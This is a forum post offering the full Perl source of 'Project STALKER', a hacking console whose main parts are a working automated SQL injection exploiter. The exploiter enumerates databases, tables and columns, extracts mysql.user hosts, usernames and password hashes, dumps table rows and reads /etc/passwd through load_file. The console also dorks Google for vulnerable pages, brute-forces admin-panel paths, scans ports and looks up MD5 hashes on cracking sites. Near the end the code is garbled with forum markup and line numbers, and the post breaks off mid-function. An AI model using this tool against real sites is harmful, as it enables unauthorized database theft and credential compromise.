[Perl] Project STALKER


BigBear (Underc0der)

[Perl] Project STALKER

  • on: August 19, 2011, 11:30:36 pm
Well, this is the new version of the console I've been writing in Perl, with the following functions

  • Improvements

    [++] Design
    [++] Fixed some bugs
    [++] Better handling of control+c
    [++] Added a MySQL client

  • Options

    [++] Resolve the IP of a host
    [++] Capture all the links on a page
    [++] List all Windows processes, with the option to kill whichever one we want
    [++] Client via sockets
    [++] Detect the HTTP methods on a website
    [++] Capture links and look for possible paths for directory listings
    [++] Encode/decode for base64, hex, ascii
    [++] Port scanner
    [++] Search for the admin panel
    [++] k0bra built in (SQLI scanner)
    [++] FTP client
    [++] File browser with the option to delete or rename files or directories
    [++] Google scan to look for pages vulnerable to SQLI

    The code is the following

    Code: Perl
#!/usr/bin/perl
#Project STALKER (C) Doddy Hackman 2011
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#
#You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
#

use IO::Socket;
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::OLE qw(in);
use Win32::Process;
use Net::FTP;
use Cwd;
use URI::Split qw(uri_split);
use MIME::Base64;
use DBI;
use Color::Output;
Color::Output::Init;

# candidate admin-panel paths tried by the "panel" command
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/'
,'autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/'
,'loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/'
,'sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/'
,'customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');


unless (-d "/logs/webs") {
mkdir("logs/",777);
mkdir("logs/webs/",777);
}

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

getinfo();

# control+c returns to the prompt instead of ending the program
$SIG{INT} = \&next;

while(1) {
cprint "\x037"; #13
menujo();
cprint "\x030";
}

sub getinfo {
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();
cprint "\x0313"; #13
print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
cprint "\x030";
}


# main command loop: reads one command and dispatches it
sub menujo {
print "\n\n>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/getinfo/ig) {
getinfo();
}
elsif ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] syntax : getip <host>\n";
}
print "\n[IP] : ".getip($1)."\n";
print "\n";
}

elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n";
$code = toma($1);
my @re = get_links($code);
for my $url(@re) {
chomp $url;
print "[Link] : $url\n";
}
print "\n\n[+] Finish\n";
}

elsif ($cmd=~/help/) {
helpme();
}

elsif ($cmd=~/getprocess/) {
my %re = getprocess();


for my $data(keys %re) {
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n";
print "[+] PID : ".$re{$data}."\n\n";
}
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed";
}
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar($1,$2,$3);
}
elsif ($cmd=~/allow (.*)/) {
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n";
}}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en($1)."\n\n";
}
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de($1)."\n\n";
}
elsif ($cmd=~/download (.*) (.*)/) {
my ($file,$name) = ($1,$2);
if (download($1,$2)) {
print "[+] File downloaded\n";
}
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii($1)."\n\n";
}
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de($1)."\n\n";
}
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base($1)."\n\n";
}
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de($1)."\n\n";
}
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
elsif ($cmd=~/scangoogle/) {
print "[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
}
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
elsif ($cmd=~/navegator/) {
nave:
print getcwd().">";
chomp(my $rta = <stdin>);
print "\n\n";
if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n";
} else {
print "[Directory] : ".$_."\n";
}}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
if (chdir($dir)) {
print "\n[+] Directory changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
if (unlink($file)) {
print "\n[+] File Deleted\n";
} else {
print "\n[-] Error\n";
}
} else {
if (rmdir($file)) {
print "\n[+] Directory Deleted\n";
} else {
print "\n[-] Error\n";
}}}
if ($rta=~/rename (.*) (.*)/) {
if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
print "\n[+] File Changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/open (.*)/) {
my $file = $1;
chomp $file;
system($file);
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n";
}
if ($rta=~/exit/) {
next;
}
print "\n\n";
goto nave;
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
chomp $url;
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
elsif ($cmd=~/exit/) {
copyright();
<stdin>;
exit(1);
}
else {
system($cmd);
}
#print "\n\n";
}


sub scansqli {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
menujo();
}
}

sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
$code = toma($inyection);
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
unless ($testar1 eq $testar2) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}}}}}


sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n";
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}}}


sub menu_options {

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>";
chomp (my $rta = <stdin>);

if ($rta=~/help/) {
print q(
commands : details tables columns dbs othertable othercolumn
           mysqluser dumper logs exit

);
}


if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($rta=~/exit/) {
next;
}

elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}



sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}
}

sub reload {
&menu_options($_[0]);
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
print "\n";
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
print "\n";
}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
print "\n";
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n";
}
}

sub dump {
savefile($_[5].".txt","\n");
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

# separator / comment pair used to join the query pieces
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0];
}

sub base {
$re = encode_base64($_[0]);
chomp $re;
return $re;
}

sub base_de {
$re = decode_base64($_[0]);
chomp $re;
return $re;
}


sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}


sub hex_en {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}

sub hex_de {
my $text = shift;
$text =~ s/^0x//;
$encode = join q[], map { chr hex } $text =~ /../g;
return $encode;
}

sub ascii_de {
my $text = shift;
$text = join q[], map { chr } split q[,],$text;
return $text;
}

# enumerates running processes through WMI (Win32_Process)
sub getprocess {

my %procesos;

my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");

foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}

sub killprocess {

my ($numb,$pid) = @_;

if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}

sub getip {
my $get = gethostbyname($_[0]);
return inet_ntoa($get);
    774. }
    775.  
    776. sub crackit {
    777.  
    778. my $secret = $_[0];
    779.  
    780. print "</li><li type="square"> Cracking $_[0]\n\n";[/li][/list]
    781.  
    782. my %hash = (
    783.    
    784. 'http://passcracking.com/' => {
    785. 'tipo'  => 'post',
    786. 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
    787. 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
    788. },  
    789. 'http://md5.hashcracking.com/search.php?md5=' =>  {
    790. 'tipo' => 'get',
    791. 'regex' => 'Cleartext of $_[0] is (.*)',
    792. },
    793. 'http://www.bigtrapeze.com/md5/' =>  {
    794. 'tipo' => 'post',
    795. 'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
    796. 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
    797. },
    798. 'http://opencrack.hashkiller.com/' =>  {
    799. 'tipo' => 'post',
    800. 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
    801. 'regex' => qq(<\/div><div class="result">$_[0]<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.+)<br\/>),
    802. },
    803. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
    804. 'tipo' => 'post',
    805. 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
    806. 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
    807. },
    808. 'http://victorov.su/md5/?md5e=&md5d=' =>  {
    809. 'tipo' => 'get',
    810. 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
    811. }
    812. );
    813.  
    814. for my $data(keys %hash) {
    815.  
    816. if ($hash{$data}{tipo} eq "get") {
    817. $code = toma($data.$_[0]);
    818. if ($code=~/$hash{$data}{regex}/ig) {
    819. print "\n</li><li type="square"> Decoded : ".$1."\n\n";[/li][/list]
    820. saveyes("logs/pass-found.txt",$secret.":".$1);
    821. }
    822. } else {
    823. $code = tomar($data,$hash{$data}{variables});
    824. if ($code=~/$hash{$data}{regex}/ig) {
    825. saveyes("logs/pass-found.txt",$secret.":".$1);
    826. }
    827. }
    828. }
    829. print "\n</li><li type="square"> Finish\n"; [/li][/list]
    830. }
    831.  
    832. sub ftp {
    833.  
    834. my ($ftp,$user,$pass) = @_;
    835.  
